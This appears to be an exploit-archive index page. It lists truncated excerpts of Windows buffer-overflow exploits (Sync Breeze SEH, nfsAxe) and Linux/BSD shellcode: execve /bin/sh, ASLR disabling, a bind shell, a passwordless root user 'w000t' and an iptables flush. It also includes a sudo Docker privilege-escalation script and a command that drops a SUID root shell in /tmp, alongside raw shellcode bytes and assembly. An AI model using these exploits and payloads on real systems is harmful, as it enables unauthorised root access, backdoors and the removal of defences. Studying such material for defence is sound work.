Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow (SEH) Exploit

Exploit for windows platform in category remote exploits Exploit Title: Sync Breeze Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH Exploit Author: Daniel Teixeira Vendor Homepage: http://www.syncbreeze.com Software Link:...

Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow (SEH)

Exploit Title: Sync Breeze Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH Date: 29/01/2018 Exploit Author: Daniel Teixeira Vendor Homepage: http://www.syncbreeze.com Software Link: http://www.syncbreeze.com/setups/syncbreezeentsetupv10.4.18.exe Version: 10.4.18 Tested on:...

LabF nfsAxe 3.7 TFTP Client - Local Buffer Overflow Exploit

Exploit for windows platform in category dos / poc !/usr/bin/python Exploit Author: Miguel Mendez Z Exploit Title: LabF nfsAxe v3.7 - TFTP "Input Directory" Local Buffer Overflow Date: 29-01-2018 Software: LabF nfsAxe Version: v3.7 Vendor Homepage: http://www.labf.com Software Link:...

Linux/x86 - Egghunter Shellcode (12 Bytes)

/ Title: Linux/x86 - EggHunter Shellcode 12 Bytes Description: Smallest Null-Free Egg Hunter Shellcode - 12 Bytes Date : 14/Jan/2018 Author: Nipun Jaswal @nipunjaswal ; SLAE-1080 Details: 1. Works with an executable EGG 2. Make sure you clear EDX, EAX registers in the shellcode before any other...

Linux/x86 - Egghunter Shellcode (12 Bytes)

Linux/x86 - Egghunter Shellcode 12 Bytes. Shellcode exploit for Linuxx86 platform / Title: Linux/x86 - EggHunter Shellcode 12 Bytes Description: Smallest Null-Free Egg Hunter Shellcode - 12 Bytes Date : 14/Jan/2018 Author: Nipun Jaswal @nipunjaswal ; SLAE-1080 Details: 1. Works with an executable...

Threat Analysis: Pylot (Travle) Malware Family

The Pylot or Travle malware family appears to be an evolution of the NetTravler malware family which has been linked to attackers out of China by numerous sources. Over the last year a variant has been observed as a secondary payload often used in conjunction with malicious carrier files typicall...

Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes)

Linux/x86 - Disable ASLR Security + Obfuscated Shellcode 23 bytes. Shellcode exploit for Linuxx86 platform ;Title : Linux/x86 - Disable ASLR Security obfuscated shellcode - 23 bytes ;Date : 24 Jan 2018 ;Author : 0xAlaufi ;Tested on : Linux/x86 Ubuntu 12.04.5 global start section .text start: jmp...

Linux/x86 - Disable ASLR Security + Obfuscated Shellcode (23 bytes)

;Title : Linux/x86 - Disable ASLR Security obfuscated shellcode - 23 bytes ;Date : 24 Jan 2018 ;Author : 0xAlaufi ;Tested on : Linux/x86 Ubuntu 12.04.5 global start section .text start: jmp zero2 zero18: mov al,0x4 jmp zero19 zero1a: mov al,0x6 jmp zero1b zeroc: push 0x72702f2f jmp zerod zero12:...

Linux/x86 ROT-N + Shift-N + XOR-N Encoded /bin/sh Shellcode (77 bytes)

/ Description ; Title : ROT-N + Shift-N + XOR-N encoded /bin/sh - Shellcode ; Author : Hashim Jawad ; Blog Post : https://ihack4falafel.com/2018/01/rot-n-shift-n-xor-n-shellcode-encoder-linux-x86/ ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/sh shell ; Tested On : Ubunt...

Linux/x86 - execve(/bin/sh) + ROT-N + Shift-N + XOR-N Encoded Shellcode (77 bytes)

Linux/x86 - execve/bin/sh + ROT-N + Shift-N + XOR-N Encoded Shellcode 77 bytes. Shellcode exploit for Linuxx86 platform / Description ; Title : ROT-N + Shift-N + XOR-N encoded /bin/sh - Shellcode ; Author : Hashim Jawad ; Blog Post :...

Docker Sudo Privilege Escalation

!/bin/bash SUDO Docker Privilege Escalation https://github.com/pyperanger/dockerevil SELINUX "bypass" using :z option https://docs.docker.com/engine/admin/volumes/bind-mounts/configure-the-selinux-label echo " SUDO Docker Privilege Escalation"; echo "+ Writing shellcode"; cat /tmp/sud0-d0ck3r.c...

Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes)

/ Description ; Title : Polymorphic execve /bin/sh - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/sh shell ; OS : Linux ; Arch : x86 ; Size : 26 bytes sh.nasm global start section .text start: ; zero out EA...

Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0,0) + execve() Shellcode (566 bytes)

/ Audio knock knock knock via /dev/dsp + setreuid0,0 + execve shellcode. Linux x86 Author: Cody Tubbs loophole of hhp. www.hhp-programming.net / email protected 12/20/2000. F.U. to ph1xry4n. -From me and dxmd... If I ripped this, show me the source... or better yet go barrow a shovel so you can d...

Linux/x86 - fork() + setreuid(0, 0) + execve(cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh) Shellcode (126

/ linux/x86 shamelessly ripped from one of my unpublished exploits / / fork's, does setreuid0, 0; then execve's: /bin/sh -c "cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh" hence dropping a SUID root shell in /tmp. / char shellc = / Shellcode to drop a SUID root shell in /tmp/sh. Forgive the Intel syntax...

Linux/x86 - Add Root User (w000t) + No Password Shellcode (177 bytes)

Linux x86 shellcode that uses execve and echo to create a passwordless root account. Author: zillion Email : email protected Homepage: safemode.org File: w000t-shell.c / This shellcode will add a passwordless local root account 'w000t' Written by email protected Why so big ? it uses execve ;- /...

Linux/x86 - execve(/bin/sh,0,0) Shellcode (21 bytes)

/ linux/x86 execve"/bin/sh",0,0 21 bytes http://www.gonullyourself.org sToRm / char shellcode = // "\x31\xc9" // xor %ecx,%ecx "\xf7\xe1" // mul %ecx "\x51" // push %ecx "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\xb0\x0b" //...

Linux/x86 - execve(/sbin/iptables -F) Shellcode (70 bytes)

Author: zillion Email: email protected Home: http://www.safemode.org Linux x86 shellcode that does an execve of /sbin/iptables -F in order to flush activated firewall rules. File: flush-iptables-shell.c / This shellcode will do /sbin/iptables -F Written by email protected / char shellcode=...

BSD/x86 - execve (/bin/sh) Shellcode (28 bytes)

/ simply execvebinsh shellcode in 28 bytes written on nasm - my first nasm exp. greetz2: mig darknet /EFnet.org dev0id rus-sec /EFnet.org rootteam.void.ru / char shellcode = "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd" "\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; void...

Linux/x86 - Bind TCP (3879/TCP) Shell (/bin/sh) Shellcode (113 bytes)

/ Connecting shellcode written by lamagra http://lamagra.seKure.de May 2000 .file "connect" .version "01.01" .text .align 4 start: socketAFINET,SOCKSTREAM,IPPROTOIP; movl %esp,%ebp xorl %edx,%edx movb $102,%edx movl %edx,%eax 102 = socketcall xorl %ecx,%ecx movl %ecx,%ebx incl %ebx socket movl...

BSD/x86 - symlink /bin/sh sh Shellcode (39 bytes)

/The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. size = 39 bytes OS = BSD written by /rootteam/dev0id rootteam.void.ru BITS 32 jmp short callme main: pop esi xor eax,eax mov byte esi+7,al mov byte esi+10,al lea ebx,esi+8 push ebx lea ebx,esi push ebx mov al,5...